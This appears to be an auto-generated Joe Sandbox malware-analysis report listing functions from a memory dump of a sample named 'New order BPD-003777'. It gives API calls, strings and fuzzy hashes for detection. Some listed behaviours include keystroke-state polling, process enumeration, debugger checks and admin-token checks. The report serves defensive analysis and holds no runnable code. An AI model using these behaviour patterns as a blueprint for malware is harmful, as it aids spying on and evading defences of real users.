Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID:
String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$UCP)$UTF)$UTF16)
API String ID: 0-4052911093
Opcode ID: bd0980b7e70ed047f63c2b3b2e8a8bb5e3e2bc2559bfd93ee747936eae874e76
Instruction ID: b4b0dbcd79ded572f2c166dab23f07b4cb411284a11b4e145c30ddeffe9bc5a1
Opcode Fuzzy Hash: bd0980b7e70ed047f63c2b3b2e8a8bb5e3e2bc2559bfd93ee747936eae874e76
Instruction Fuzzy Hash: F372B375E202169BDF15CF59D8907AEB7B5FF44310F24816AE809EB381EB709D918F50

Function 00319F86 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 260windownativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00299BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00299BB2

GetSystemMetrics.USER32(0000000F), ref: 00319FC7
GetSystemMetrics.USER32(0000000F), ref: 00319FE7
MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0031A224
SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0031A242
SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0031A263
ShowWindow.USER32(00000003,00000000), ref: 0031A282
InvalidateRect.USER32(?,00000000,00000001), ref: 0031A2A7
NtdllDialogWndProc_W.NTDLL(?,00000005,?,?), ref: 0031A2CA

Strings

, xrefs: 0031A1D8

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: Window$MessageMetricsSendSystem$DialogInvalidateLongMoveNtdllProc_RectShow
String ID:
API String ID: 830902736-3916222277
Opcode ID: 28c8c0959e2c306221a57336b7e59462d99ac1d3310d8d8da2c16203366419d8
Instruction ID: a3e8ed67e44a4a49d117a30a8980f96ed35a4255503fb8bd875d8b6eac471852
Opcode Fuzzy Hash: 28c8c0959e2c306221a57336b7e59462d99ac1d3310d8d8da2c16203366419d8
Instruction Fuzzy Hash: F9B1A831601615EFDF1ACF68C9857EE7BF2BF48702F098069EC49AB295D731A980CB51

Function 0029912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00299141
ScreenToClient.USER32(00000000,?), ref: 0029915E
GetAsyncKeyState.USER32(00000001), ref: 00299183
GetAsyncKeyState.USER32(00000002), ref: 0029919D

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 092579ec0bead5eb89a0a6b56bce19d2030a101440c60bd54e7fe8ab96084734
Instruction ID: 30af34ed3a761d5162359ef916ac24f3358b0f997e79e3e695eefe1027599b14
Opcode Fuzzy Hash: 092579ec0bead5eb89a0a6b56bce19d2030a101440c60bd54e7fe8ab96084734
Instruction Fuzzy Hash: 07415E3191851BABDF199F68C844BEEB775FF09320F20831AE429A62D0D7745DA0DB91

Function 002AE1E0 Relevance: 6.1, APIs: 2, Strings: 1, Instructions: 848COMMON

Download Yara Rule

Strings

pow, xrefs: 002AE2E5, 002AE302

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID:
String ID: pow
API String ID: 0-2276729525
Opcode ID: a59070abc3bbfb2803b7dde0529aa26e314ff21e5104dd935f9c84d8d26e6dd9
Instruction ID: 3cac3bc592fe22b3826f4f55b36d37606832ca656ca3498365e0c918d0688a44
Opcode Fuzzy Hash: a59070abc3bbfb2803b7dde0529aa26e314ff21e5104dd935f9c84d8d26e6dd9
Instruction Fuzzy Hash: 43522831D39F024EDB235A34CC22376675CAFA33C1F55C72BE826B59A5EB29C8935141

Function 002ED4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 002ED501
Process32FirstW.KERNEL32(00000000,?), ref: 002ED50F
Process32NextW.KERNEL32(00000000,?), ref: 002ED52F
CloseHandle.KERNEL32(00000000), ref: 002ED5DC

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 47be20405caa819b968c83bfe76873a16a700a8b98de3152f9ed2bea9fe14391
Instruction ID: 3c30c1b3af7255ca998f50987b57735b08022446b46f610746ed89834307b66c
Opcode Fuzzy Hash: 47be20405caa819b968c83bfe76873a16a700a8b98de3152f9ed2bea9fe14391
Instruction Fuzzy Hash: 9231D4710583419FD301EF54C885ABFBBF8EF99344F94092DF581831A2EB719958CB92

Function 00318FC9 Relevance: 6.1, APIs: 4, Instructions: 78nativewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00299BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00299BB2

GetCursorPos.USER32(?), ref: 00319001
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,?,?,?,?,002D7711,?,?), ref: 00319016
GetCursorPos.USER32(?), ref: 0031905E
NtdllDialogWndProc_W.NTDLL(?,0000007B,?,?,?,?,?,?,?,?,?,?,002D7711,?,?), ref: 00319094

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
String ID:
API String ID: 1423138444-0
Opcode ID: 4db8d32d05eba2343bc34e6a3505a255b894f1234f9512ec4bac0c2845223fd4
Instruction ID: b964e920779a212bb39a0e3e1b9898cad14e2de830ce18a083a271814ac6a1fd
Opcode Fuzzy Hash: 4db8d32d05eba2343bc34e6a3505a255b894f1234f9512ec4bac0c2845223fd4
Instruction Fuzzy Hash: D3216D35610118AFDB2ACF95C868FEA7BB9EB4E361F1440AAF90547261C7319D90DB60

Function 00319EF3 Relevance: 6.1, APIs: 4, Instructions: 55nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00299BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00299BB2

GetClientRect.USER32(?,?), ref: 00319F31
GetCursorPos.USER32(?), ref: 00319F3B
ScreenToClient.USER32(?,?), ref: 00319F46
NtdllDialogWndProc_W.NTDLL(?,00000020,?,00000000,?), ref: 00319F7A

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: Client$CursorDialogLongNtdllProc_RectScreenWindow
String ID:
API String ID: 1010295502-0
Opcode ID: 649a54c380959af10802d947acfe05a5b282640271548335a61ddfad416fefe6
Instruction ID: 4882cc4f8007d446d1a4a0a190fb693fb979ea191acf0285048b6b85c4343946
Opcode Fuzzy Hash: 649a54c380959af10802d947acfe05a5b282640271548335a61ddfad416fefe6
Instruction Fuzzy Hash: C211483290021ABBDB16DF68C855AEE77BDFB09312F004456F911E7150D330BAD6CBA1

Function 002EDBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,002C5222), ref: 002EDBCE
GetFileAttributesW.KERNEL32(?), ref: 002EDBDD
FindFirstFileW.KERNEL32(?,?), ref: 002EDBEE
FindClose.KERNEL32(00000000), ref: 002EDBFA

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: ad268228acd9646ffd6a6fa6aa65e786400b75faf5416647a5186e56b4d024da
Instruction ID: 1abc0b539b01e83671e0f5eb95c0491d59e86c0c505b6cf02bdb8351803a8b23
Opcode Fuzzy Hash: ad268228acd9646ffd6a6fa6aa65e786400b75faf5416647a5186e56b4d024da
Instruction Fuzzy Hash: C2F0A0308B091067C2216F78AC0D8AA376C9E05374FA0AB03F836C20E0EBB059658696

Function 002B2622 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 002B271A
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 002B2724
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 002B2731

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: e4b44cbc50cc365653b842acae2a9ec93d90e90bebe01bb4e46f889b96c8a642
Instruction ID: 11810a97d7470df8a441a8149d4df497008a910b25301ca150ff129f54e4c8e3
Opcode Fuzzy Hash: e4b44cbc50cc365653b842acae2a9ec93d90e90bebe01bb4e46f889b96c8a642
Instruction Fuzzy Hash: A831D374951318ABCB21DF68DC887DCBBB8AF08310F5041EAE81CA7261EB349F958F44

Function 002E1663 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON

Download Yara Rule

APIs

AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 002E168C
CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 002E16A1
FreeSid.ADVAPI32(?), ref: 002E16B1

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: AllocateCheckFreeInitializeMembershipToken
String ID:
API String ID: 3429775523-0
Opcode ID: b3a43a8a7a315a1c67eecd04cc3051897feba5e006568427a1f3367379156363
Instruction ID: eeeb873d7c4bc50cf7e08e2f6dd43fcedbc3dc7c43c6630ea00025c8e328015b
Opcode Fuzzy Hash: b3a43a8a7a315a1c67eecd04cc3051897feba5e006568427a1f3367379156363
Instruction Fuzzy Hash: 88F0F4719A0309FBDB00DFE49C89EAEBBBCEB08704F508565E501E2181E774EA448A50

Function 002A4CE8 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,002A4CBE,?,003488B8,0000000C,002A4E63,?,00000000,00000000,?,002A056E,?,00000007,003486C8,00000014), ref: 002A4D09
TerminateProcess.KERNEL32(00000000,?,002A4CBE,?,003488B8,0000000C,002A4E63,?,00000000,00000000,?,002A056E,?,00000007,003486C8,00000014), ref: 002A4D10
ExitProcess.KERNEL32 ref: 002A4D22

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: 04ea749e17e507b68a219b93513917bbb413b28edabb0b9a558cb7003635abb4
Instruction ID: 343061bd79036455a15eda60b31b67f541d0a24f5b57d573277e27bb07fa4751
Opcode Fuzzy Hash: 04ea749e17e507b68a219b93513917bbb413b28edabb0b9a558cb7003635abb4
Instruction Fuzzy Hash: D9E0B631060548ABCF12BF54DD09A987B6DEB8A785F108414FD158A122DB79DE62CA80

Function 0028CAF0 Relevance: 3.2, Strings: 2, Instructions: 659COMMON

Download Yara Rule

Strings

Variable is not of type 'Object'., xrefs: 002D0C40
p#5, xrefs: 0028CF7F

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID:
String ID: Variable is not of type 'Object'.$p#5
API String ID: 0-123761422
Opcode ID: 517eaf0012769e05e25ac17b9317719734e1941a4a8508979bc60b61c848c663
Instruction ID: ac54d324eeaea9c242b7467ebf966b0ca5bb31c399020faeaa16f6c9a83c9e8d
Opcode Fuzzy Hash: 517eaf0012769e05e25ac17b9317719734e1941a4a8508979bc60b61c848c663
Instruction Fuzzy Hash: BC329E78921219DBDF14EF90D880BEDB7B5BF05304F20805AE906AB3E2D771AD65CB60

Function 002997C0 Relevance: 3.1, APIs: 2, Instructions: 80nativeCOMMON

Download Yara Rule

APIs

Part of subcall function 00299BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00299BB2

Part of subcall function 00299944: GetWindowLongW.USER32(?,000000EB), ref: 00299952

GetParent.USER32(?), ref: 002D73A3
NtdllDialogWndProc_W.NTDLL(?,00000133,?,?,?,?), ref: 002D742D

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: LongWindow$DialogNtdllParentProc_
String ID:
API String ID: 314495775-0
Opcode ID: c83299c74d29c7945e9aa4ba85fd62b79f4f990b2510a2f119b241cbe10c0b7e
Instruction ID: 9e5b7ee5229be5c1635b52e59928810e2c874e06a111df35080c277a5207c347
Opcode Fuzzy Hash: c83299c74d29c7945e9aa4ba85fd62b79f4f990b2510a2f119b241cbe10c0b7e
Instruction Fuzzy Hash: 1A21B170620105AFCF269F2CCC59EA93BA5EF0A3B0F04429AF9254B3B1D3719DB1DA40

Function 003190A1 Relevance: 3.0, APIs: 2, Instructions: 44nativewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00299BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00299BB2

NtdllDialogWndProc_W.NTDLL(?,0000002B,?,?,?,?,?,?,?,002D769C,?,?,?), ref: 00319111

Part of subcall function 00299944: GetWindowLongW.USER32(?,000000EB), ref: 00299952

SendMessageW.USER32(?,00000401,00000000,00000000), ref: 003190F7

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: LongWindow$DialogMessageNtdllProc_Send
String ID:
API String ID: 1273190321-0
Opcode ID: 9fa9748924d817f3303a1d1cef946785a97abf76426fb52cccab66b19b245024
Instruction ID: 32c21ec1e31778effcbe2f848363574065453935b5c5be135a7cec9ea8e621b6
Opcode Fuzzy Hash: 9fa9748924d817f3303a1d1cef946785a97abf76426fb52cccab66b19b245024
Instruction Fuzzy Hash: 8601BC30100214BBDB269F24DC69FE67BAAEB8A365F140029F9550A2E1C7326C91CB50

Function 002F37B5 Relevance: 3.0, APIs: 2, Instructions: 33windowCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00304891,?,?,?), ref: 002F37E4
FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00304891,?,?,?), ref: 002F37F4

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: ErrorFormatLastMessage
String ID:
API String ID: 3479602957-0
Opcode ID: 6a86117b0d43c2693f96dfebc3c809a766b28379623788d572e8796e935ac584
Instruction ID: b0023d275d7e19b3fba211de42d903819f7d1c32d5bb406272fc2108bdcc2277
Opcode Fuzzy Hash: 6a86117b0d43c2693f96dfebc3c809a766b28379623788d572e8796e935ac584
Instruction Fuzzy Hash: EBF0EC746153192AD72067655C4DFEB769DEFC9761F000175F505D2281D5A09944C7B0

Function 00319400 Relevance: 3.0, APIs: 2, Instructions: 32nativeCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 00319423
NtdllDialogWndProc_W.NTDLL(?,00000200,?,?,?,?,?,?,?,002D776C,?,?,?,?,?), ref: 0031944C

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777781555.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_280000_New order BPD-003777.jbxd

Similarity

API ID: ClientDialogNtdllProc_Screen
String ID:
API String ID: 3420055661-0
Opcode ID: 7241b753a3e8b3d114be203715191d5b84b573632a182ffa6bea1468ba0f8414
Instruction ID: c99f9f2f02c35adc743d512126d25628e4958075d621a755af62a6500e5f268a
Opcode Fuzzy Hash: 7241b753a3e8b3d114be203715191d5b84b573632a182ffa6bea1468ba0f8414
Instruction Fuzzy Hash: 25F03A72410218FFEF068F51DC09EEE7FBDEB49351F00405AF905A2160D375AA54DBA0

Function 0031953A Relevance: 3.0, APIs: 2, Instructions: 21nativeCOMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 00319542
NtdllDialogWndProc_W.NTDLL(?,00000084,00000000,?,?,002D76FB,?,?,?,?), ref: 0031956C

Memory Dump Source

Source File: 00000000.00000002.1777619146.0000000000281000.00000040.00000001.01000000.00000003.sdmp, Offset: 00280000, based on PE: true

Associated: 00000000.00000002.1777602622.0000000000280000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000342000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000034C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.000000000035A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777619146.0000000000421000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1777759938.0000000000427000.00000080.00000001.01000000.00000003.sdmpDownload File
